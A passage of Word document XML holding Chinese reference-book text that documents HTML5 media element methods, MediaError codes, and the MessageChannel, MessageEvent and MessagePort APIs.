      </w:r>
      <w:r>
        <w:t>"probably"</w:t>
      </w:r>
      <w:r>
        <w:t>。媒体元素通常不会返回</w:t>
      </w:r>
      <w:r>
        <w:t>"probably"</w:t>
      </w:r>
      <w:r>
        <w:t>，除非</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>包含一个列出指定媒体编码的</w:t>
      </w:r>
      <w:r>
        <w:t>codecs=</w:t>
      </w:r>
      <w:r>
        <w:t>参数。如果媒体元素不确定它是否可以播放指定</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>，这个方法将返回</w:t>
      </w:r>
      <w:r>
        <w:t>"maybe"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void load()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法重置媒体元素，让它选择一个媒体资源并开始加载数据。当媒体元素首先插入到文档中，或当设置了它的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性时，这个动作会自动发生。但是，如果添加、移除或修改了对</w:t>
      </w:r>
      <w:r>
        <w:t>应媒体元素的＜</w:t>
      </w:r>
      <w:r>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:t>＞子孙元素，必须显式地调用</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void pause()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>暂停媒体的播放。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void play()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>开始播放媒体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="850" w:name="MediaError"/>
      <w:r>
        <w:t>MediaError</w:t>
      </w:r>
      <w:bookmarkEnd w:id="850"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签上发生错误时，将触发一个错误事件，对应的</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>属性将设置为一个</w:t>
      </w:r>
      <w:r>
        <w:t>MediaError</w:t>
      </w:r>
      <w:r>
        <w:t>对象。对应的</w:t>
      </w:r>
      <w:r>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:t>属性将指明发生的错误的类型，下面的常量定义该属性可能的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short MEDIA_ERR_ABORTED=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用户请求浏览器停止加载媒</w:t>
      </w:r>
      <w:r>
        <w:t>体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>unsigned short MEDIA_ERR_NETWORK=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>媒体类型正确，但一个网络错误阻止它的加载。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short MEDIA_ERR_DECODE=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>媒体类型正确，但一个编码错误阻止它的解码及播放。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short MEDIA_ERR_SRC_NOT_SUPPORTED=4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定的媒体不是浏览器可播放的类型。</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short code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性描述发生的媒体错误的类型。它的值将是上面的常量之一。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="851" w:name="MessageChannel"/>
      <w:r>
        <w:t>Messa</w:t>
      </w:r>
      <w:r>
        <w:t>geChannel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="851"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一对已连接的</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePorts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>MessageChannel</w:t>
      </w:r>
      <w:r>
        <w:t>简单来说是一对已连接的</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>对象。在任何一方上调用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>都将在另一方上触发一个消息事件。如果想用</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程建立一个私有的通信通道，只需</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>要创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>MessageChannel</w:t>
      </w:r>
      <w:r>
        <w:t>并将</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>对中的一个成员传入对应的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>（使用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>ports</w:t>
      </w:r>
      <w:r>
        <w:t>参数）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>MessageChannel</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>类型是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的高级特性，在写作本书的时候，一些浏览器支持跨域消息（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）以及</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.4</w:t>
      </w:r>
      <w:r>
        <w:t>节），但还不支持</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>类型的私有通信通道。</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MessageChannel()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个不带参数的构造函数返回一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>MessageChannel</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly MessagePort port1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly MessagePort port2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是定义了通信通道的两个已连接的端口。两者是对称的：为代码保留某一个或另一个，将另一个传入到你想与之通信的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="852" w:name="MessageEvent"/>
      <w:r>
        <w:t>MessageEvent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="852"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>从另一个执行上下文来的消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有很多</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>都使用消息事件来在不相关的执行上下文中实现异步通信。</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>对象都定义了用于处理消息事件的</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>属性。与消息事件关联的消息可以是任意能像</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节描述的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>那样复制的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>值。消息</w:t>
      </w:r>
      <w:r>
        <w:t>将被一个</w:t>
      </w:r>
      <w:r>
        <w:t>MessageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象包装起来，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性访问。各种依赖消息事件的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>也在</w:t>
      </w:r>
      <w:r>
        <w:t>MessageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象中定义一些额外的属性。消息事件不会冒泡，也没有可取消的默认行为。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly any data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性保存正在发送的消息。</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>可以是能通过结构化复制算法（参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）的任意类型：这包括对象以及数组这样的核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>值，但不包括函数。尽管</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用，但是</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点等客户端的值不可</w:t>
      </w:r>
      <w:r>
        <w:t>以使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string lastEventId</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>18.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）上的消息事件，这个字段包含由服务器发送的</w:t>
      </w:r>
      <w:r>
        <w:t>lastEventId</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，如果存在的话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string origin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>18.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）或</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）上的消息事件，这个属性包含消息发送者的原始</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly MessagePort[]ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）、</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）或</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>上的消息事件，如果在对应的</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>的调用中传入了</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>对象，这个属性将以数组的形式包含这些</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Window source</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）上的消息事件，这个属性指代消息发送自的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="853" w:name="MessagePort"/>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:bookmarkEnd w:id="853"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传递异步消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>用于事件驱动的异步消息传递，通常在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScrip</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>执行上下文之中，如</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程。</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>必须以成对相连的形式使用：参见</w:t>
      </w:r>
      <w:r>
        <w:t>MessageChannel</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>上调用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>将在与它连接的</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>上触发一个消息事件。跨域的消息</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）以及</w:t>
      </w:r>
      <w:r>
        <w:t>Web Worker</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）也使用</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和消息事件来通信。这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>实际上使用的是隐式的</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>对象。显式地使用</w:t>
      </w:r>
      <w:r>
        <w:t>MessageChannel</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>将启用额外的私有通信</w:t>
      </w:r>
      <w:r>
        <w:t>通道，例如，允许在两个兄弟</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中直接通信。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>MessageChannel</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>类型是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的高级特性，在写作本书的时候，一些浏览器支持跨域消息（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）以及</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.4</w:t>
      </w:r>
      <w:r>
        <w:t>节），但不支持</w:t>
      </w:r>
      <w:r>
        <w:t>MessagePort</w:t>
      </w:r>
      <w:r>
        <w:t>类型的私有通信通道。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void close()</w:t>
      </w:r>
    </w:p>
